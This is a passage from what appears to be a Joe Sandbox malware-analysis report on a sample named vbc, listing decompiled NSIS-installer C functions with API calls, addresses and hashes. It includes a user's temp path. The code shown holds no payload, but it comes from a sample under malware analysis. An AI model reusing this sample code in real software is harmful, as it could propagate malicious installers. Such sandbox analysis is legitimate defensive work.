                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E00406484();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
                                                					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                				} else {
                                                					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                					_t50 = 0;
                                                				}
                                                				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                			}



















                                                0x00404d4f
                                                0x00404d54
                                                0x00404d5c
                                                0x00404d5d
                                                0x00404d6a
                                                0x00404d72
                                                0x00404d73
                                                0x00404d75
                                                0x00404d77
                                                0x00404d79
                                                0x00404d7c
                                                0x00404d7c
                                                0x00404d83
                                                0x00404d89
                                                0x00404d89
                                                0x00404d90
                                                0x00404d97
                                                0x00404d9a
                                                0x00404d9d
                                                0x00404d9d
                                                0x00404da1
                                                0x00404db1
                                                0x00404db3
                                                0x00404db6
                                                0x00404d5f
                                                0x00404d5f
                                                0x00404d66
                                                0x00404d66
                                                0x00404dbe
                                                0x00404dc9
                                                0x00404ddf
                                                0x00404df0
                                                0x00404e0c

                                                APIs
                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                • wsprintfW.USER32 ref: 00404DF0
                                                • SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                				void* _t20;
                                                				void* _t21;
                                                				int _t24;
                                                				int _t30;
                                                				intOrPtr _t33;
                                                				void* _t34;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				void* _t42;
                                                
                                                				_t42 = __eflags;
                                                				_t33 = __edx;
                                                				_t30 = __ebx;
                                                				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                				_t34 = __eax;
                                                				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                				 *(_t39 - 0x44) = E00402DA6(2);
                                                				_t20 = E00402DA6(0x11);
                                                				 *(_t39 - 4) = 1;
                                                				_t21 = E00402E36(_t42, _t34, _t20, 2);
                                                				 *(_t39 + 8) = _t21;
                                                				if(_t21 != __ebx) {
                                                					_t24 = 0;
                                                					if(_t37 == 1) {
                                                						E00402DA6(0x23);
                                                						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                					}
                                                					if(_t37 == 4) {
                                                						 *0x40b5f0 = E00402D84(3);
                                                						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                						_t24 = _t37;
                                                					}
                                                					if(_t37 == 3) {
                                                						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
                                                					}
                                                					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24) == 0) {
                                                						 *(_t39 - 4) = _t30;
                                                					}
                                                					_push( *(_t39 + 8));
                                                					RegCloseKey();
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                				return 0;
                                                			}












                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248a
                                                0x0040248d
                                                0x00402494
                                                0x0040249e
                                                0x004024a1
                                                0x004024aa
                                                0x004024b1
                                                0x004024b8
                                                0x004024bb
                                                0x004024c1
                                                0x004024cb
                                                0x004024cf
                                                0x004024da
                                                0x004024da
                                                0x004024e1
                                                0x004024eb
                                                0x004024f1
                                                0x004024f4
                                                0x004024f4
                                                0x004024f8
                                                0x00402504
                                                0x00402504
                                                0x0040251d
                                                0x0040251f
                                                0x0040251f
                                                0x00402522
                                                0x004025fd
                                                0x004025fd
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb88D0.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32 ref: 00402515
                                                • RegCloseKey.ADVAPI32(?), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp
                                                • API String ID: 2655323295-3763254134
                                                • Opcode ID: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                • Opcode Fuzzy Hash: a042c767b6986487cf95de5ddc7f1c8febd38642eeecd0575e21ea379906e559
                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00405E0C(WCHAR* _a4) {
                                                				WCHAR* _t9;
                                                
                                                				_t9 = _a4;
                                                				_push( &(_t9[lstrlenW(_t9)]));
                                                				_push(_t9);
                                                				if( *(CharPrevW()) != 0x5c) {
                                                					lstrcatW(_t9, 0x40a014);
                                                				}
                                                				return _t9;
                                                			}




                                                0x00405e0d
                                                0x00405e1a
                                                0x00405e1b
                                                0x00405e26
                                                0x00405e2e
                                                0x00405e2e
                                                0x00405e36

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                • CharPrevW.USER32(?,00000000), ref: 00405E1C
                                                • lstrcatW.KERNEL32 ref: 00405E2E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E732810E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                				void* _v0;
                                                				void* _t27;
                                                				signed int _t29;
                                                				void* _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t63;
                                                				void* _t64;
                                                				signed int _t66;
                                                				void* _t67;
                                                				void* _t73;
                                                				void* _t74;
                                                				void* _t77;
                                                				void* _t80;
                                                				void _t81;
                                                				void _t82;
                                                				intOrPtr _t84;
                                                				void* _t86;
                                                				void* _t88;
                                                
                                                				 *0x7328506c = _a8;
                                                				 *0x73285070 = _a16;
                                                				 *0x73285074 = _a12;
                                                				_a12( *0x73285048, E73281651, _t73);
                                                				_t66 =  *0x7328506c +  *0x7328506c * 4 << 3;
                                                				_t27 = E732812E3();
                                                				_v0 = _t27;
                                                				_t74 = _t27;
                                                				if( *_t27 == 0) {
                                                					L28:
                                                					return GlobalFree(_t27);
                                                				}
                                                				do {
                                                					_t29 =  *_t74 & 0x0000ffff;
                                                					_t67 = 2;
                                                					_t74 = _t74 + _t67;
                                                					_t88 = _t29 - 0x66;
                                                					if(_t88 > 0) {
                                                						_t30 = _t29 - 0x6c;
                                                						if(_t30 == 0) {
                                                							L23:
                                                							_t31 =  *0x73285040;
                                                							if( *0x73285040 == 0) {
                                                								goto L26;
                                                							}
                                                							E73281603( *0x73285074, _t31 + 4, _t66);
                                                							_t34 =  *0x73285040;
                                                							_t86 = _t86 + 0xc;
                                                							 *0x73285040 =  *_t34;
                                                							L25:
                                                							GlobalFree(_t34);
                                                							goto L26;
                                                						}
                                                						_t36 = _t30 - 4;
                                                						if(_t36 == 0) {
                                                							L13:
                                                							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73281312(E7328135A(_t38));
                                                							L14:
                                                							goto L25;
                                                						}
                                                						_t40 = _t36 - _t67;
                                                						if(_t40 == 0) {
                                                							L11:
                                                							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                							_t74 = _t74 + _t67;
                                                							_t34 = E73281381(_t80, E732812E3());
                                                							goto L14;
                                                						}
                                                						L8:
                                                						if(_t40 == 1) {
                                                							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                							_t10 = _t81 + 4; // 0x4
                                                							E73281603(_t10,  *0x73285074, _t66);
                                                							_t86 = _t86 + 0xc;
                                                							 *_t81 =  *0x73285040;
                                                							 *0x73285040 = _t81;
                                                						}
                                                						goto L26;
                                                					}
                                                					if(_t88 == 0) {
                                                						_t48 =  *0x73285070;
                                                						_t77 =  *_t48;
                                                						 *_t48 =  *_t77;
                                                						_t49 = _v0;
                                                						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                							E73281603(_t49, _t77 + 8, 0x38);
                                                							_t86 = _t86 + 0xc;
                                                						}
                                                						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                						GlobalFree(_t77);
                                                						goto L26;
                                                					}
                                                					_t54 = _t29 - 0x46;
                                                					if(_t54 == 0) {
                                                						_t82 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c + 8);
                                                						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                						_t14 = _t82 + 8; // 0x8
                                                						E73281603(_t14, _v0, 0x38);
                                                						_t86 = _t86 + 0xc;
                                                						 *_t82 =  *( *0x73285070);
                                                						 *( *0x73285070) = _t82;
                                                						goto L26;
                                                					}
                                                					_t63 = _t54 - 6;
                                                					if(_t63 == 0) {
                                                						goto L23;
                                                					}
                                                					_t64 = _t63 - 4;
                                                					if(_t64 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L13;
                                                					}
                                                					_t40 = _t64 - _t67;
                                                					if(_t40 == 0) {
                                                						 *_t74 =  *_t74 + 0xa;
                                                						goto L11;
                                                					}
                                                					goto L8;
                                                					L26:
                                                				} while ( *_t74 != 0);
                                                				_t27 = _v0;
                                                				goto L28;
                                                			}


























                                                0x732810eb
                                                0x73281100
                                                0x73281109
                                                0x7328110e
                                                0x73281119
                                                0x7328111c
                                                0x73281125
                                                0x73281129
                                                0x7328112b
                                                0x732812b0
                                                0x732812ba
                                                0x732812ba
                                                0x73281132
                                                0x73281132
                                                0x73281137
                                                0x73281138
                                                0x7328113a
                                                0x7328113d
                                                0x73281256
                                                0x73281259
                                                0x73281271
                                                0x73281271
                                                0x73281278
                                                0x00000000
                                                0x00000000
                                                0x73281285
                                                0x7328128a
                                                0x7328128f
                                                0x73281294
                                                0x7328129a
                                                0x7328129b
                                                0x00000000
                                                0x7328129b
                                                0x7328125b
                                                0x7328125e
                                                0x732811bc
                                                0x732811bf
                                                0x732811c2
                                                0x732811cb
                                                0x732811d0
                                                0x00000000
                                                0x732811d1
                                                0x73281264
                                                0x73281266
                                                0x732811a2
                                                0x732811a5
                                                0x732811a8
                                                0x732811b1
                                                0x00000000
                                                0x732811b1
                                                0x73281164
                                                0x73281165
                                                0x73281177
                                                0x73281180
                                                0x73281184
                                                0x7328118e
                                                0x73281191
                                                0x73281193
                                                0x73281193
                                                0x00000000
                                                0x73281165
                                                0x73281143
                                                0x73281218
                                                0x7328121d
                                                0x73281221
                                                0x73281223
                                                0x7328122c
                                                0x7328122f
                                                0x73281238
                                                0x7328123d
                                                0x7328123d
                                                0x73281247
                                                0x7328124a
                                                0x00000000
                                                0x73281250
                                                0x73281149
                                                0x7328114c
                                                0x732811e9
                                                0x732811ed
                                                0x732811f7
                                                0x732811fb
                                                0x73281205
                                                0x7328120a
                                                0x73281211
                                                0x00000000
                                                0x73281211
                                                0x73281152
                                                0x73281155
                                                0x00000000
                                                0x00000000
                                                0x7328115b
                                                0x7328115e
                                                0x732811b8
                                                0x00000000
                                                0x732811b8
                                                0x73281160
                                                0x73281162
                                                0x7328119e
                                                0x00000000
                                                0x7328119e
                                                0x00000000
                                                0x732812a1
                                                0x732812a1
                                                0x732812ab
                                                0x00000000

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 73281171
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 732811E3
                                                • GlobalFree.KERNEL32 ref: 7328124A
                                                • GlobalFree.KERNEL32(?), ref: 7328129B
                                                • GlobalFree.KERNEL32(00000000), ref: 732812B1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688751399.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000003.00000002.688743070.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688756158.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000003.00000002.688761184.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
                                                • Instruction ID: 2b7ff6cefeae060417f7d1f7aee24ae4471fa8e3051e53f7a67dcec46da4f5de
                                                • Opcode Fuzzy Hash: b30f8b16a9929c06682517c255e62fc699cd63c29608cb870f802680e8e0e983
                                                • Instruction Fuzzy Hash: 8E519BB6A00322DFE700DF69C848BE677F8EB08715B248119E94ADB2D4E775B990DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                				signed int _t14;
                                                				int _t17;
                                                				void* _t24;
                                                				intOrPtr* _t29;
                                                				void* _t31;
                                                				signed int _t32;
                                                				void* _t35;
                                                				void* _t40;
                                                				signed int _t42;
                                                
                                                				_t29 = __edi;
                                                				_t24 = __ebx;
                                                				_t14 =  *(_t35 - 0x28);
                                                				_t40 = __edx - 0x38;
                                                				 *(_t35 - 0x10) = _t14;
                                                				_t27 = 0 | _t40 == 0x00000000;
                                                				_t32 = _t40 == 0;
                                                				if(_t14 == __ebx) {
                                                					if(__edx != 0x38) {
                                                						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                					} else {
                                                						E00402DA6(0x21);
                                                						E0040655F("C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp", "C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp\System.dll", 0x400);
                                                						_t17 = lstrlenA("C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp\System.dll");
                                                					}
                                                				} else {
                                                					E00402D84(1);
                                                					 *0x40adf0 = __ax;
                                                					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                				}
                                                				 *(_t35 + 8) = _t17;
                                                				if( *_t29 == _t24) {
                                                					L13:
                                                					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                				} else {
                                                					_t31 = E0040649D(_t27, _t29);
                                                					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                						_t14 = E004060DF(_t31, "C:\Users\Albus\AppData\Local\Temp\nsb88D0.tmp\System.dll",  *(_t35 + 8));
                                                						_t42 = _t14;
                                                						if(_t42 == 0) {
                                                							goto L13;
                                                						}
                                                					} else {
                                                						goto L13;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}












                                                0x0040263e
                                                0x0040263e
                                                0x0040263e
                                                0x00402643
                                                0x00402646
                                                0x00402649
                                                0x0040264e
                                                0x00402650
                                                0x00402670
                                                0x004026aa
                                                0x00402672
                                                0x00402674
                                                0x00402688
                                                0x00402695
                                                0x00402695
                                                0x00402652
                                                0x00402654
                                                0x00402659
                                                0x00402667
                                                0x0040266a
                                                0x004026af
                                                0x004026b2
                                                0x0040292e
                                                0x0040292e
                                                0x004026b8
                                                0x004026c1
                                                0x004026c3
                                                0x004026e2
                                                0x004015b4
                                                0x004015b6
                                                0x00000000
                                                0x004015bc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026c3
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb88D0.tmp$C:\Users\user\AppData\Local\Temp\nsb88D0.tmp\System.dll
                                                • API String ID: 1659193697-3594164756
                                                • Opcode ID: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                • Opcode Fuzzy Hash: 055331aa1ecea8bfcda913bd06822b13da84f48a5f1a47c8ed214fd280e803f9
                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403019(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					if( *0x42aa20 == 0) {
                                                						_t2 = GetTickCount();
                                                						if(_t2 >  *0x434f0c) {
                                                							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                							 *0x42aa20 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00406946(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x42aa20;
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x42aa20 = 0;
                                                					return _t6;
                                                				}
                                                			}






                                                0x00403020
                                                0x00403040
                                                0x0040304a
                                                0x00403056
                                                0x00403067
                                                0x00403070
                                                0x00000000
                                                0x00403075
                                                0x0040307c
                                                0x00403042
                                                0x00403049
                                                0x00403049
                                                0x00403022
                                                0x00403022
                                                0x00403029
                                                0x0040302c
                                                0x0040302c
                                                0x00403032
                                                0x00403039
                                                0x00403039

                                                APIs
                                                • DestroyWindow.USER32 ref: 0040302C
                                                • GetTickCount.KERNEL32(00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040304A
                                                • CreateDialogParamW.USER32 ref: 00403067
                                                • ShowWindow.USER32(00000000,00000005), ref: 00403075
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
